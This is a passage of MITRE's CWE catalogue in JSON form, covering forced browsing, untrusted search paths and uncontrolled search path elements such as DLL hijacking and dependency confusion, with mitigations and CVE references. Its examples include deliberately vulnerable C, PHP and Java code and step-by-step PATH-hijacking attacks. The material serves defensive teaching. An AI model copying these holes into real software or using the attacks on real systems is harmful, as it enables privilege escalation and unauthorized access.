access"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Alternate Path Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Protect Alternate Path","attr":{"@_Date":"2010-12-13"}}]}},"425":{"attr":{"@_ID":"425","@_Name":"Direct Request (\'Forced Browsing\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.","Extended_Description":"Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"424","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"forced browsing","Description":"The \\"forced browsing\\" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Operation"],"Description":"Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files."},{"Phase":"Architecture and Design","Description":"Consider using MVC based frameworks such as Struts."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"JSP"},"xhtml:div":"http://somesite.com/someapplication/admin.jsp"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2144","Description":"Bypass authentication via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2144"},{"Reference":"CVE-2005-1892","Description":"Infinite loop or infoleak triggered by direct requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1892"},{"Reference":"CVE-2004-2257","Description":"Bypass auth/auth via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2257"},{"Reference":"CVE-2005-1688","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1688"},{"Reference":"CVE-2005-1697","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1697"},{"Reference":"CVE-2005-1698","Description":"Direct request leads to infoleak by error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1698"},{"Reference":"CVE-2005-1685","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1685"},{"Reference":"CVE-2005-1827","Description":"Authentication bypass via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1827"},{"Reference":"CVE-2005-1654","Description":"Authorization bypass using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1654"},{"Reference":"CVE-2005-1668","Description":"Access privileged functionality using direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1668"},{"Reference":"CVE-2002-1798","Description":"Upload arbitrary files via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1798"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Direct Request aka \'Forced Browsing\'"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A10","Entry_Name":"Failure to Restrict URL Access","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":34,"Entry_Name":"Predictable Resource Location"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":[{"#text":"Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Forced browsing\\" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically \\"authentication bypass\\" or \\"path disclosure,\\" although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"426":{"attr":{"@_ID":"426","@_Name":"Untrusted Search Path","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application\'s direct control.","Extended_Description":{"xhtml:p":["This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. The problem extends to any type of critical resource that the application trusts.","Some of the most common variants of untrusted search path are:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["In various UNIX and Linux-based systems, the PATH environment variable may be consulted to locate executable programs, and LD_PRELOAD may be used to locate a separate library.","In various Microsoft-based systems, the PATH environment variable is consulted to locate a DLL, if the DLL is not found in other paths that appear earlier in the search order."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"673","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"427","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"428","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Untrusted Path"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The program could be redirected to the wrong files, potentially triggering a crash or hang when the targeted file is too large or does not have the expected format."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could send the output of unauthorized files to the attacker."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions and system calls that suggest when a search path is being used. One pattern is when the program performs multiple accesses of the same file but in different directories, with repeated failures until the proper filename is found. Library calls such as getenv() or their equivalent can be checked to see if any path-related variables are being accessed."]}},{"Method":"Automated Static Analysis","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Method":"Manual Analysis","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-68"},"Intro_Text":"This code prints all of the running processes belonging to the current user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = getCurrentUser();$command = \'ps aux | grep \' . $userName;system($command);","xhtml:br":["","","",""],"xhtml:i":"//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78)"}},"Body_Text":"If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users."},{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1120","Description":"Application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1120"},{"Reference":"CVE-2008-1810","Description":"Database application relies on its PATH environment variable to find and execute program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1810"},{"Reference":"CVE-2007-2027","Description":"Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2027"},{"Reference":"CVE-2008-3485","Description":"Untrusted search path using malicious .EXE in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3485"},{"Reference":"CVE-2008-2613","Description":"setuid program allows compromise using path that finds and loads a malicious library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2613"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Functional_Areas":{"Functional_Area":["Program Invocation","Code Libraries"]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Search Path"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Relative path library search"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"38"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, Process Attributes, page 603"}},{"attr":{"@_External_Reference_ID":"REF-176","@_Section":"Chapter 8, "Canonical Representation Issues." Page 229"}},{"attr":{"@_External_Reference_ID":"REF-207","@_Section":"Chapter 12, "Trust Management and Input Validation." Pages 317-320."}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, "Don\'t Trust the PATH - Use Full Path Names" Page 385"}}]},"Notes":{"Note":{"#text":"Search path issues on Windows are under-studied and possibly under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"427":{"attr":{"@_ID":"427","@_Name":"Uncontrolled Search Path Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.","Extended_Description":{"xhtml:p":["Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as \\"/tmp\\" or the current working directory.","In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled:","In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used.","In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element.","In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the directory from which the program has been loaded","the current working directory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"DLL preloading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Binary planting","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Insecure library loading","Description":"This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427."},{"Term":"Dependency confusion","Description":"As of February 2021, this term is used to describe CWE-427 in the context of managing installation of software package dependencies, in which attackers release packages on public sites where the names are the same as package names used by private repositories, and the search for the dependent package tries the public site first, downloading untrusted code. It may also be referred to as a \\"substitution attack.\\""}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":"Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths."},{"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths."},{"Phase":"Implementation","Description":"Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. Since this is a denylist approach, it might not be a complete solution."},{"Phase":"Implementation","Description":"Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of finding the program using the PATH environment variable, while execl() and execv() require a full path."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-29"},"Intro_Text":"The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.Runtime.getRuntime().exec(\\"make\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker\'s make will now be run with these privileges, possibly giving the attacker complete control of the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-3402","Description":"\\"DLL hijacking\\" issue in document editor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3402"},{"Reference":"CVE-2010-3397","Description":"\\"DLL hijacking\\" issue in encryption software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3397"},{"Reference":"CVE-2010-3138","Description":"\\"DLL hijacking\\" issue in library used by multiple media players.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138"},{"Reference":"CVE-2010-3152","Description":"\\"DLL hijacking\\" issue in illustration program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3152"},{"Reference":"CVE-2010-3147","Description":"\\"DLL hijacking\\" issue in address book.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147"},{"Reference":"CVE-2010-3135","Description":"\\"DLL hijacking\\" issue in network monitoring software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3135"},{"Reference":"CVE-2010-3131","Description":"\\"DLL 